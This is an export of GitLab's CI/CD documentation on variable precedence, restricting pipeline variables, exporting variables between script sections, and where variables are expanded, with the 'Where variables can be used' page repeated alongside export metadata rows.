reports](job_scripts.md#pass-an-environment-variable-to-another-job). 1. Job variables, defined in jobs in the `.gitlab-ci.yml` file. 1. Default variables for all jobs, defined at the top-level of the `.gitlab-ci.yml` file. 1. [Deployment variables](predefined_variables.md#deployment-variables). 1. [Predefined variables](predefined_variables.md). For example: ```yaml variables: API_TOKEN: "default" job1: variables: API_TOKEN: "secure" script: - echo "The variable is '$API_TOKEN'" ``` In this example, `job1` outputs `The variable is 'secure'` because variables defined in jobs in the `.gitlab-ci.yml` file have higher precedence than default variables. ## Use pipeline variables Pipeline variables are variables that are specified when running a new pipeline. Prerequisites: - You must have the Developer role in the project. You can specify a pipeline variable when you: - [Run a pipeline manually](../pipelines/_index.md#run-a-pipeline-manually) in the UI. - Create a pipeline by using [the `pipelines` API endpoint](../../api/pipelines.md#create-a-new-pipeline). - Create a pipeline by using [the `triggers` API endpoint](../triggers/_index.md#pass-cicd-variables-in-the-api-call). - Use [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd). - Pass variables to a downstream pipeline by using either the [`variables` keyword](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline), [`trigger:forward` keyword](../yaml/_index.md#triggerforward) or [`dotenv` variables](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job). These variables have [higher precedence](#cicd-variable-precedence) and can override other defined variables, including [predefined variables](predefined_variables.md). {{< alert type="warning" >}} You should avoid overriding predefined variables in most cases, as it can cause the pipeline to behave unexpectedly. {{< /alert >}} {{< alert type="note" >}} In [GitLab 17.7](../../update/deprecations.md#increased-default-security-for-use-of-pipeline-variables) and later, [pipeline inputs](../inputs/_index.md#for-a-pipeline) are recommended over passing pipeline variables. For enhanced security, you should [disable pipeline variables](#restrict-pipeline-variables) when using inputs. {{< /alert >}} ### Restrict pipeline variables {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/440338) in GitLab 17.1. - For GitLab.com, setting defaults [updated for all new projects in new namespaces](https://gitlab.com/gitlab-org/gitlab/-/issues/502382) to `no_one_allowed` for `ci_pipeline_variables_minimum_override_role` in GitLab 17.7. {{< /history >}} You can limit who can [run pipelines with pipeline variables](#use-pipeline-variables) to specific user roles. When users with a lower role try to use pipeline variables, they receive an `Insufficient permissions to set pipeline variables` error message. Prerequisites: - You must have the Maintainer role in the project. If the minimum role was previously set to `owner` or `no_one_allowed`, then you must have the Owner role in the project. To limit the use of pipeline variables to only the Maintainer role and higher: - Go to **Settings > CI/CD > Variables**. - Under **Minimum role to use pipeline variables**, select one of: - `no_one_allowed`: No pipelines can run with pipeline variables. Default for new projects in new namespaces on GitLab.com. - `owner`: Only users with the Owner role can run pipelines with pipeline variables. You must have the Owner role for the project to change the setting to this value. - `maintainer`: Only users with at least the Maintainer role can run pipelines with pipeline variables. Default when not specified on GitLab Self-Managed and GitLab Dedicated. - `developer`: Only users with at least the Developer role can run pipelines with pipeline variables. You can also use [the projects API](../../api/projects.md#edit-a-project) to set the role for the `ci_pipeline_variables_minimum_override_role` setting. This restriction does not affect the use of CI/CD variables from the project or group settings. Most jobs can still use the `variables` keyword in the YAML configuration, but not jobs that use the `trigger` keyword to trigger downstream pipelines. Trigger jobs pass variables to a downstream pipelines as pipeline variables, which is also controlled by this setting. ## Exporting variables Scripts executed in separate shell contexts do not share exports, aliases, local function definitions, or any other local shell updates. This means that if a job fails, variables created by user-defined scripts are not exported. When runners execute jobs defined in `.gitlab-ci.yml`: - Scripts specified in `before_script` and the main script are executed together in a single shell context, and are concatenated. - Scripts specified in `after_script` run in a shell context completely separate to the `before_script` and the specified scripts. Regardless of the shell the scripts are executed in, the runner output includes: - Predefined variables. - Variables defined in: - Instance, group, or project CI/CD settings. - The `.gitlab-ci.yml` file in the `variables:` section. - The `.gitlab-ci.yml` file in the `secrets:` section. - The `config.toml`. The runner cannot handle manual exports, shell aliases, and functions executed in the body of the script, like `export MY_VARIABLE=1`. For example, in the following `.gitlab-ci.yml` file, the following scripts are defined: ```yaml job: variables: JOB_DEFINED_VARIABLE: "job variable" before_script: - echo "This is the 'before_script' script" - export MY_VARIABLE="variable" script: - echo "This is the 'script' script" - echo "JOB_DEFINED_VARIABLE's value is ${JOB_DEFINED_VARIABLE}" - echo "CI_COMMIT_SHA's value is ${CI_COMMIT_SHA}" - echo "MY_VARIABLE's value is ${MY_VARIABLE}" after_script: - echo "JOB_DEFINED_VARIABLE's value is ${JOB_DEFINED_VARIABLE}" - echo "CI_COMMIT_SHA's value is ${CI_COMMIT_SHA}" - echo "MY_VARIABLE's value is ${MY_VARIABLE}" ``` When the runner executes the job: 1. `before_script` is executed: 1. Prints to the output. 1. Defines the variable for `MY_VARIABLE`. 1. `script` is executed: 1. Prints to the output. 1. Prints the value of `JOB_DEFINED_VARIABLE`. 1. Prints the value of `CI_COMMIT_SHA`. 1. Prints the value of `MY_VARIABLE`. 1. `after_script` is executed in a new, separate shell context: 1. Prints to the output. 1. Prints the value of `JOB_DEFINED_VARIABLE`. 1. Prints the value of `CI_COMMIT_SHA`. 1. Prints an empty value of `MY_VARIABLE`. The variable value cannot be detected because `after_script` is in a separate shell context to `before_script`. ## Related topics - You can configure [Auto DevOps](../../topics/autodevops/_index.md) to pass CI/CD variables to a running application. To make a CI/CD variable available as an environment variable in the running application's container, [prefix the variable key](../../topics/autodevops/cicd_variables.md#configure-application-secret-variables) with `K8S_SECRET_`. - The [Managing the Complex Configuration Data Management Monster Using GitLab](https://www.youtube.com/watch?v=v4ZOJ96hAck) video is a walkthrough of the [Complex Configuration Data Monorepo](https://gitlab.com/guided-explorations/config-data-top-scope/config-data-subscope/config-data-monorepo) working example project. It explains how multiple levels of group CI/CD variables can be combined with environment-scoped project variables for complex configuration of application builds or deployments. The example can be copied to your own group or instance for testing. More details on what other GitLab CI patterns are demonstrated are available at the project page. - You can [pass CI/CD variables to downstream pipelines](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline). Use [`trigger:forward` keyword](../yaml/_index.md#triggerforward) to specify what type of variables to pass to the downstream pipeline.
https://docs.gitlab.com/ci/where_variables_can_be_used
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/where_variables_can_be_used.md
2025-08-13
doc/ci/variables
[ "doc", "ci", "variables" ]
where_variables_can_be_used.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Where variables can be used
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} As it's described in the [CI/CD variables](_index.md) documentation, you can define many different variables. Some of them can be used for all GitLab CI/CD features, but some of them are more or less limited. This document describes where and how the different types of variables can be used. ## Variables usage There are two places defined variables can be used. On the: 1. GitLab side, in the `.gitlab-ci.yml` file. 1. The GitLab Runner side, in `config.toml`. ### `.gitlab-ci.yml` file {{< history >}} - Support for `CI_ENVIRONMENT_*` variables except `CI_ENVIRONMENT_SLUG` [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/128694) in GitLab 16.4. {{< /history >}} | Definition | Can be expanded? | Expansion place | Description | |:------------------------------------------------------------------------|:-----------------|:-----------------------|:------------| | [`after_script`](../yaml/_index.md#after_script) | yes | Script execution shell | The variable expansion is made by the [execution shell environment](#execution-shell-environment). | | [`artifacts:name`](../yaml/_index.md#artifactsname) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`artifacts:paths`](../yaml/_index.md#artifactspaths) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`artifacts:exclude`](../yaml/_index.md#artifactsexclude) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`before_script`](../yaml/_index.md#before_script) | yes | Script execution shell | The variable expansion is made by the [execution shell environment](#execution-shell-environment) | | [`cache:key`](../yaml/_index.md#cachekey) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`cache:paths`](../yaml/_index.md#cachepaths) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`cache:policy`](../yaml/_index.md#cachepolicy) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`environment:name`](../yaml/_index.md#environmentname) | yes | GitLab | Similar to `environment:url`, but the variables expansion doesn't support the following:<br/><br/>- `CI_ENVIRONMENT_*` variables.<br/>- [Persisted variables](#persisted-variables). | | [`environment:url`](../yaml/_index.md#environmenturl) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab.<br/><br/>Supported are all variables defined for a job (project/group variables, variables from `.gitlab-ci.yml`, variables from triggers, variables from pipeline schedules).<br/><br/>Not supported are variables defined in the GitLab Runner `config.toml` and variables created in the job's `script`. | | [`environment:auto_stop_in`](../yaml/_index.md#environmentauto_stop_in) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab.<br/><br/> The value of the variable being substituted should be a period of time in a human readable natural language form. See [supported values](../yaml/_index.md#environmentauto_stop_in) for more information. | | [`environment:kubernetes:agent`](../yaml/_index.md#environmentkubernetes) | yes | GitLab | Similar to `environment:url`, but the variables expansion does not support the following:<br/><br/>- `CI_ENVIRONMENT_*` variables.<br/>- [Persisted variables](#persisted-variables). | | [`environment:kubernetes:namespace`](../yaml/_index.md#environmentkubernetes) | yes | GitLab | Similar to `environment:url`, but the variables expansion does not support the following:<br/><br/>- `CI_ENVIRONMENT_*` variables.<br/>- [Persisted variables](#persisted-variables). | | [`id_tokens:aud`](../yaml/_index.md#id_tokens) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. Variable expansion [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/414293) in GitLab 16.1. | | [`image`](../yaml/_index.md#image) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`include`](../yaml/_index.md#include) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. <br/><br/>See [Use variables with include](../yaml/includes.md#use-variables-with-include) for more information on supported variables. | | [`resource_group`](../yaml/_index.md#resource_group) | yes | GitLab | Similar to `environment:url`, but the variables expansion doesn't support the following:<br/>- `CI_ENVIRONMENT_URL`<br/>- [Persisted variables](#persisted-variables). | | [`rules:changes`](../yaml/_index.md#ruleschanges) | no | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. | | [`rules:changes:compare_to`](../yaml/_index.md#ruleschangescompare_to) | no | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. | | [`rules:exists`](../yaml/_index.md#rulesexists) | no | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. | | [`rules:if`](../yaml/_index.md#rulesif) | no | Not applicable | The variable must be in the form of `$variable`. Not supported are the following:<br/><br/>- `CI_ENVIRONMENT_SLUG` variable.<br/>- [Persisted variables](#persisted-variables). | | [`script`](../yaml/_index.md#script) | yes | Script execution shell | The variable expansion is made by the [execution shell environment](#execution-shell-environment). | | [`services:name`](../yaml/_index.md#services) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`services`](../yaml/_index.md#services) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`tags`](../yaml/_index.md#tags) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. | | [`trigger` and `trigger:project`](../yaml/_index.md#trigger) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. Variable expansion for `trigger:project` [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/367660) in GitLab 15.3. | | [`variables`](../yaml/_index.md#variables) | yes | GitLab/Runner | The variable expansion is first made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab, and then any unrecognized or unavailable variables are expanded by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`workflow:name`](../yaml/_index.md#workflowname) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab.<br/><br/>Supported are all variables available in `workflow`:<br/>- Project/Group variables.<br/>- Global `variables` and `workflow:rules:variables` (when matching the rule).<br/>- Variables inherited from parent pipelines.<br/>- Variables from triggers.<br/>- Variables from pipeline schedules.<br/><br/>Not supported are variables defined in the GitLab Runner `config.toml`, variables defined in jobs, or [Persisted variables](#persisted-variables). | ### `config.toml` file | Definition | Can be expanded? | Description | |:-------------------------------------|:-----------------|:------------| | `runners.environment` | yes | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism) | | `runners.kubernetes.pod_labels` | yes | The Variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism) | | `runners.kubernetes.pod_annotations` | yes | The Variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism) | You can read more about `config.toml` in the [GitLab Runner docs](https://docs.gitlab.com/runner/configuration/advanced-configuration.html). ## Expansion mechanisms There are three expansion mechanisms: - GitLab - GitLab Runner - Execution shell environment ### GitLab internal variable expansion mechanism The expanded part needs to be in a form of `$variable`, or `${variable}` or `%variable%`. Each form is handled in the same way, no matter which OS/shell handles the job, because the expansion is done in GitLab before any runner gets the job. #### Nested variable expansion GitLab expands job variable values recursively before sending them to the runner. For example, in the following scenario: ```yaml - BUILD_ROOT_DIR: '${CI_BUILDS_DIR}' - OUT_PATH: '${BUILD_ROOT_DIR}/out' - PACKAGE_PATH: '${OUT_PATH}/pkg' ``` The runner receives a valid, fully-formed path. For example, if `${CI_BUILDS_DIR}` is `/output`, then `PACKAGE_PATH` would be `/output/out/pkg`. References to unavailable variables are left intact. In this case, the runner [attempts to expand the variable value](#gitlab-runner-internal-variable-expansion-mechanism) at runtime. For example, a variable like `CI_BUILDS_DIR` is known by the runner only at runtime. ### GitLab Runner internal variable expansion mechanism - Supported: project/group variables, `.gitlab-ci.yml` variables, `config.toml` variables, and variables from triggers, pipeline schedules, and manual pipelines. - Not supported: variables defined inside of scripts (for example, `export MY_VARIABLE="test"`). The runner uses Go's `os.Expand()` method for variable expansion. It means that it handles only variables defined as `$variable` and `${variable}`. What's also important, is that the expansion is done only once, so nested variables may or may not work, depending on the ordering of variables definitions, and whether [nested variable expansion](#nested-variable-expansion) is enabled in GitLab. For artifacts and cache uploads, the runner uses [mvdan.cc/sh/v3/expand](https://pkg.go.dev/mvdan.cc/sh/v3/expand) for variable expansion instead of Go's `os.Expand()` because `mvdan.cc/sh/v3/expand` supports [parameter expansion](https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html). ### Execution shell environment This is an expansion phase that takes place during the `script` execution. Its behavior depends on the shell used (`bash`, `sh`, `cmd`, PowerShell). For example, if the job's `script` contains a line `echo $MY_VARIABLE-${MY_VARIABLE_2}`, it should be properly handled by bash/sh (leaving empty strings or some values depending whether the variables were defined or not), but don't work with Windows' `cmd` or PowerShell, because these shells use a different variables syntax. Supported: - The `script` may use all available variables that are default for the shell (for example, `$PATH` which should be present in all bash/sh shells) and all variables defined by GitLab CI/CD (project/group variables, `.gitlab-ci.yml` variables, `config.toml` variables, and variables from triggers and pipeline schedules). - The `script` may also use all variables defined in the lines before. So, for example, if you define a variable `export MY_VARIABLE="test"`: - In `before_script`, it works in the subsequent lines of `before_script` and all lines of the related `script`. - In `script`, it works in the subsequent lines of `script`. - In `after_script`, it works in subsequent lines of `after_script`. In the case of `after_script` scripts, they can: - Only use variables defined before the script within the same `after_script` section. - Not use variables defined in `before_script` and `script`. These restrictions exist because `after_script` scripts are executed in a [separated shell context](../yaml/_index.md#after_script). ## Persisted variables Some predefined variables are called persisted. Persisted variables are: - Supported for definitions where the [expansion place](#gitlab-ciyml-file) is: - Runner. - Script execution shell. - Not supported: - For definitions where the [expansion place](#gitlab-ciyml-file) is GitLab. - In `rules` [variables expressions](../jobs/job_rules.md#cicd-variable-expressions). [Pipeline trigger jobs](../yaml/_index.md#trigger) cannot use job-level persisted variables, but can use pipeline-level persisted variables. Some of the persisted variables contain tokens and cannot be used by some definitions due to security reasons. Pipeline-level persisted variables: - `CI_PIPELINE_ID` - `CI_PIPELINE_URL` Job-level persisted variables: - `CI_DEPLOY_PASSWORD` - `CI_DEPLOY_USER` - `CI_JOB_ID` - `CI_JOB_STARTED_AT` - `CI_JOB_TOKEN` - `CI_JOB_URL` - `CI_PIPELINE_CREATED_AT` - `CI_REGISTRY_PASSWORD` - `CI_REGISTRY_USER` - `CI_REPOSITORY_URL` ## Variables with an environment scope Variables defined with an environment scope are supported. Given that there is a variable `$STAGING_SECRET` defined in a scope of `review/staging/*`, the following job that is using dynamic environments is created, based on the matching variable expression: ```yaml my-job: stage: staging environment: name: review/$CI_JOB_STAGE/deploy script: - 'deploy staging' rules: - if: $STAGING_SECRET == 'something' ```
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Where variables can be used breadcrumbs: - doc - ci - variables --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} As it's described in the [CI/CD variables](_index.md) documentation, you can define many different variables. Some of them can be used for all GitLab CI/CD features, but some of them are more or less limited. This document describes where and how the different types of variables can be used. ## Variables usage There are two places defined variables can be used. On the: 1. GitLab side, in the `.gitlab-ci.yml` file. 1. The GitLab Runner side, in `config.toml`. ### `.gitlab-ci.yml` file {{< history >}} - Support for `CI_ENVIRONMENT_*` variables except `CI_ENVIRONMENT_SLUG` [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/128694) in GitLab 16.4. {{< /history >}} | Definition | Can be expanded? | Expansion place | Description | |:------------------------------------------------------------------------|:-----------------|:-----------------------|:------------| | [`after_script`](../yaml/_index.md#after_script) | yes | Script execution shell | The variable expansion is made by the [execution shell environment](#execution-shell-environment). | | [`artifacts:name`](../yaml/_index.md#artifactsname) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`artifacts:paths`](../yaml/_index.md#artifactspaths) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`artifacts:exclude`](../yaml/_index.md#artifactsexclude) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`before_script`](../yaml/_index.md#before_script) | yes | Script execution shell | The variable expansion is made by the [execution shell environment](#execution-shell-environment) | | [`cache:key`](../yaml/_index.md#cachekey) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`cache:paths`](../yaml/_index.md#cachepaths) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`cache:policy`](../yaml/_index.md#cachepolicy) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`environment:name`](../yaml/_index.md#environmentname) | yes | GitLab | Similar to `environment:url`, but the variables expansion doesn't support the following:<br/><br/>- `CI_ENVIRONMENT_*` variables.<br/>- [Persisted variables](#persisted-variables). | | [`environment:url`](../yaml/_index.md#environmenturl) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab.<br/><br/>Supported are all variables defined for a job (project/group variables, variables from `.gitlab-ci.yml`, variables from triggers, variables from pipeline schedules).<br/><br/>Not supported are variables defined in the GitLab Runner `config.toml` and variables created in the job's `script`. | | [`environment:auto_stop_in`](../yaml/_index.md#environmentauto_stop_in) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab.<br/><br/> The value of the variable being substituted should be a period of time in a human readable natural language form. See [supported values](../yaml/_index.md#environmentauto_stop_in) for more information. | | [`environment:kubernetes:agent`](../yaml/_index.md#environmentkubernetes) | yes | GitLab | Similar to `environment:url`, but the variables expansion does not support the following:<br/><br/>- `CI_ENVIRONMENT_*` variables.<br/>- [Persisted variables](#persisted-variables). | | [`environment:kubernetes:namespace`](../yaml/_index.md#environmentkubernetes) | yes | GitLab | Similar to `environment:url`, but the variables expansion does not support the following:<br/><br/>- `CI_ENVIRONMENT_*` variables.<br/>- [Persisted variables](#persisted-variables). | | [`id_tokens:aud`](../yaml/_index.md#id_tokens) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. Variable expansion [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/414293) in GitLab 16.1. | | [`image`](../yaml/_index.md#image) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`include`](../yaml/_index.md#include) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. <br/><br/>See [Use variables with include](../yaml/includes.md#use-variables-with-include) for more information on supported variables. | | [`resource_group`](../yaml/_index.md#resource_group) | yes | GitLab | Similar to `environment:url`, but the variables expansion doesn't support the following:<br/>- `CI_ENVIRONMENT_URL`<br/>- [Persisted variables](#persisted-variables). | | [`rules:changes`](../yaml/_index.md#ruleschanges) | no | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. | | [`rules:changes:compare_to`](../yaml/_index.md#ruleschangescompare_to) | no | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. | | [`rules:exists`](../yaml/_index.md#rulesexists) | no | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. | | [`rules:if`](../yaml/_index.md#rulesif) | no | Not applicable | The variable must be in the form of `$variable`. Not supported are the following:<br/><br/>- `CI_ENVIRONMENT_SLUG` variable.<br/>- [Persisted variables](#persisted-variables). | | [`script`](../yaml/_index.md#script) | yes | Script execution shell | The variable expansion is made by the [execution shell environment](#execution-shell-environment). | | [`services:name`](../yaml/_index.md#services) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`services`](../yaml/_index.md#services) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`tags`](../yaml/_index.md#tags) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. | | [`trigger` and `trigger:project`](../yaml/_index.md#trigger) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. Variable expansion for `trigger:project` [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/367660) in GitLab 15.3. | | [`variables`](../yaml/_index.md#variables) | yes | GitLab/Runner | The variable expansion is first made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab, and then any unrecognized or unavailable variables are expanded by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | [`workflow:name`](../yaml/_index.md#workflowname) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab.<br/><br/>Supported are all variables available in `workflow`:<br/>- Project/Group variables.<br/>- Global `variables` and `workflow:rules:variables` (when matching the rule).<br/>- Variables inherited from parent pipelines.<br/>- Variables from triggers.<br/>- Variables from pipeline schedules.<br/><br/>Not supported are variables defined in the GitLab Runner `config.toml`, variables defined in jobs, or [Persisted variables](#persisted-variables). | ### `config.toml` file | Definition | Can be expanded? | Description | |:-------------------------------------|:-----------------|:------------| | `runners.environment` | yes | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism) | | `runners.kubernetes.pod_labels` | yes | The Variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism) | | `runners.kubernetes.pod_annotations` | yes | The Variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism) | You can read more about `config.toml` in the [GitLab Runner docs](https://docs.gitlab.com/runner/configuration/advanced-configuration.html). ## Expansion mechanisms There are three expansion mechanisms: - GitLab - GitLab Runner - Execution shell environment ### GitLab internal variable expansion mechanism The expanded part needs to be in a form of `$variable`, or `${variable}` or `%variable%`. Each form is handled in the same way, no matter which OS/shell handles the job, because the expansion is done in GitLab before any runner gets the job. #### Nested variable expansion GitLab expands job variable values recursively before sending them to the runner. For example, in the following scenario: ```yaml - BUILD_ROOT_DIR: '${CI_BUILDS_DIR}' - OUT_PATH: '${BUILD_ROOT_DIR}/out' - PACKAGE_PATH: '${OUT_PATH}/pkg' ``` The runner receives a valid, fully-formed path. For example, if `${CI_BUILDS_DIR}` is `/output`, then `PACKAGE_PATH` would be `/output/out/pkg`. References to unavailable variables are left intact. In this case, the runner [attempts to expand the variable value](#gitlab-runner-internal-variable-expansion-mechanism) at runtime. For example, a variable like `CI_BUILDS_DIR` is known by the runner only at runtime. ### GitLab Runner internal variable expansion mechanism - Supported: project/group variables, `.gitlab-ci.yml` variables, `config.toml` variables, and variables from triggers, pipeline schedules, and manual pipelines. - Not supported: variables defined inside of scripts (for example, `export MY_VARIABLE="test"`). The runner uses Go's `os.Expand()` method for variable expansion. It means that it handles only variables defined as `$variable` and `${variable}`. What's also important, is that the expansion is done only once, so nested variables may or may not work, depending on the ordering of variables definitions, and whether [nested variable expansion](#nested-variable-expansion) is enabled in GitLab. For artifacts and cache uploads, the runner uses [mvdan.cc/sh/v3/expand](https://pkg.go.dev/mvdan.cc/sh/v3/expand) for variable expansion instead of Go's `os.Expand()` because `mvdan.cc/sh/v3/expand` supports [parameter expansion](https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html). ### Execution shell environment This is an expansion phase that takes place during the `script` execution. Its behavior depends on the shell used (`bash`, `sh`, `cmd`, PowerShell). For example, if the job's `script` contains a line `echo $MY_VARIABLE-${MY_VARIABLE_2}`, it should be properly handled by bash/sh (leaving empty strings or some values depending whether the variables were defined or not), but don't work with Windows' `cmd` or PowerShell, because these shells use a different variables syntax. Supported: - The `script` may use all available variables that are default for the shell (for example, `$PATH` which should be present in all bash/sh shells) and all variables defined by GitLab CI/CD (project/group variables, `.gitlab-ci.yml` variables, `config.toml` variables, and variables from triggers and pipeline schedules). - The `script` may also use all variables defined in the lines before. So, for example, if you define a variable `export MY_VARIABLE="test"`: - In `before_script`, it works in the subsequent lines of `before_script` and all lines of the related `script`. - In `script`, it works in the subsequent lines of `script`. - In `after_script`, it works in subsequent lines of `after_script`. In the case of `after_script` scripts, they can: - Only use variables defined before the script within the same `after_script` section. - Not use variables defined in `before_script` and `script`. These restrictions exist because `after_script` scripts are executed in a [separated shell context](../yaml/_index.md#after_script). ## Persisted variables Some predefined variables are called persisted. Persisted variables are: - Supported for definitions where the [expansion place](#gitlab-ciyml-file) is: - Runner. - Script execution shell. - Not supported: - For definitions where the [expansion place](#gitlab-ciyml-file) is GitLab. - In `rules` [variables expressions](../jobs/job_rules.md#cicd-variable-expressions). [Pipeline trigger jobs](../yaml/_index.md#trigger) cannot use job-level persisted variables, but can use pipeline-level persisted variables. Some of the persisted variables contain tokens and cannot be used by some definitions due to security reasons. Pipeline-level persisted variables: - `CI_PIPELINE_ID` - `CI_PIPELINE_URL` Job-level persisted variables: - `CI_DEPLOY_PASSWORD` - `CI_DEPLOY_USER` - `CI_JOB_ID` - `CI_JOB_STARTED_AT` - `CI_JOB_TOKEN` - `CI_JOB_URL` - `CI_PIPELINE_CREATED_AT` - `CI_REGISTRY_PASSWORD` - `CI_REGISTRY_USER` - `CI_REPOSITORY_URL` ## Variables with an environment scope Variables defined with an environment scope are supported. Given that there is a variable `$STAGING_SECRET` defined in a scope of `review/staging/*`, the following job that is using dynamic environments is created, based on the matching variable expression: ```yaml my-job: stage: staging environment: name: review/$CI_JOB_STAGE/deploy script: - 'deploy staging' rules: - if: $STAGING_SECRET == 'something' ```
https://docs.gitlab.com/ci/variables_troubleshooting
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/variables_troubleshooting.md
2025-08-13
doc/ci/variables
[ "doc", "ci", "variables" ]
variables_troubleshooting.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Troubleshooting CI/CD variables
null
